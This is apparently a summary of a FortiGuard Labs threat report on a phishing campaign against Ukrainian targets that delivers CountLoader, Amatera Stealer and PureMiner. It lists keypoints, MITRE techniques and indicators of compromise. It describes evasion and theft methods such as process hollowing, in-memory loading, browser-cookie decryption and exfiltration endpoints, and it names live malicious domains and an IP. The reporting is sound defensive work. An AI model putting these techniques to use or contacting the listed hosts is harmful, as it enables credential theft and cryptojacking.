FortiGuard Labs observed a phishing campaign impersonating Ukrainian government agencies that used malicious SVG attachments to deliver a CHM → HTA loader (CountLoader) which fetched and executed fileless payloads Amatera Stealer and PureMiner. The campaign enabled data exfiltration (credentials, browser and wallet files, system info) and resource hijacking for cryptomining via techniques like process hollowing, .NET AOT execution, and in-memory Python loading. #Amatera #PureMiner
Keypoints
- Phishing emails spoofed Ukrainian authorities and used a malicious SVG attachment that loaded an external SVG to display a spoofed Adobe Reader page and prompt a password-protected archive download.
- The downloaded archive contained a CHM that executed a remote HTA (CountLoader), which connected to a C2 and supported commands to download/extract/execute payloads, perform domain reconnaissance, and remove tasks.
- Two ZIP archives were delivered: ergosystem.zip ( PureMiner ) used DLL sideloading, .NET AOT, and process hollowing to run an in-memory cryptominer; smtpB.zip ( Amatera Stealer ) used a Python interpreter and PythonMemoryModule to load the stealer into memory.
- Amatera Stealer harvested extensive data including system info, browser (Gecko/Chromium) data and cookies (with legacy DPAPI and ABE decryption techniques), cryptocurrency wallets, Steam/Telegram data, and arbitrary files per configuration rules.
- PureMiner collected GPU/CPU adapter details via AMD/NVIDIA APIs and registry queries, validated system memory, communicated with C2 using 3DES-encrypted protobuf configuration, and could deploy CPU/GPU mining modules and anti-analysis checks.
- Both payloads operated filelessly (in-memory execution) and used obfuscation, encryption (RC4 for configuration in Amatera), and serialized/encrypted communication to evade detection.
- Fortinet protections detect components of this campaign across FortiGate, FortiMail, FortiClient, and FortiEDR, and FortiGuard services block the identified threats and phishing infrastructure.
MITRE Techniques
- [T1566] Phishing – Malicious emails impersonated Ukrainian government agencies and included an SVG attachment prompting the victim to open a password-protected archive (“…the phishing emails contain malicious Scalable Vector Graphics (SVG) files designed to trick recipients into opening harmful attachments…”).
- [T1204] User Execution – The SVG displayed a spoofed Adobe Reader interface to convince users to extract and open the bundled CHM/HTA (“…it displays a spoofed Adobe Reader interface with the message ‘Please wait, your document is loading…’ and automatically redirects the victim to a download page…”).
- [T1218] System Binary Proxy Execution (rundll32, msiexec, etc.) – CountLoader supports commands to execute downloaded DLLs with rundll32 and MSI with msiexec (“…Download a DLL to the %userprofile%Music directory and execute it with rundll32…Download an MSI file to the %userprofile%Music directory and execute it with msiexec.exe.”).
- [T1047] Windows Management Instrumentation and API Abuse – PureMiner queries AMD/NVIDIA libraries and registry keys for video adapter details to determine mining suitability (“…uses APIs from the AMD Display Library (atiadlxx.dll / atiadlxy.dll) and NVIDIA library (nvapi.dll / nvapi64.dll)…can also query video adapter information directly from the system registry…”).
- [T1055] Process Injection – The ergosystem.zip payload decrypts and injects its payload into a created .NET Framework tool process using process hollowing (“…decrypted and then injected into a newly created .NET Framework tool process using process hollowing.”).
- [T1620] Reflective Code Loading (in-memory execution) – smtpB.zip used PythonMemoryModule to load Amatera Stealer directly into memory without writing to disk (“…loading the payload directly into memory without writing it to disk. To achieve this, it uses the PythonMemoryModule project from GitHub.”).
- [T1112] Modify Registry – Amatera locates Steam installation and other application paths via registry keys to harvest files (“…locates the Steam installation path in the registry under: HKEY_LOCAL_MACHINESOFTWAREWOW6432NodeValveSteam…”).
- [T1537] Transfer Data to Cloud Account – Amatera exfiltrates harvested data via repeated HTTP POST requests to its C2 endpoints (“/core/sendPart”) (“…each data category is sent via separate HTTP POST requests to the /core/sendPart endpoint…”).
- [T1505] Server Software Component, SCM/Service Execution – Use of DLL sideloading by a trusted executable to load malicious DLLs in ergosystem.zip (“…DLL sideloading is used: a trusted executable loads a malicious DLL.”).
Indicators of Compromise
- [Domain ] phishing infrastructure and download hosts – npulvivgov.cfdms-team-ping1.com, azure-expresscontainer3.com (examples; campaign uses domains with numbered variations).
- [Domain ] additional malicious domains – acqua-tecnica.it, phuyufact.com (examples listed as infrastructure and drop sites).
- [IP ] hosting/malicious servers – 109.176.207.110 (example IP observed for campaign infrastructure).
- [File name ] initial attachment and archive – elektronni_zapit_NPU.svg (malicious SVG attachment), ergosystem.zip and smtpB.zip (downloaded archives delivering PureMiner and Amatera Stealer).
- [File hash ] malicious payloads – SHA-256 long hash beginning bcce8115…4369 (example of provided file hash; report lists many hashes and other long entries).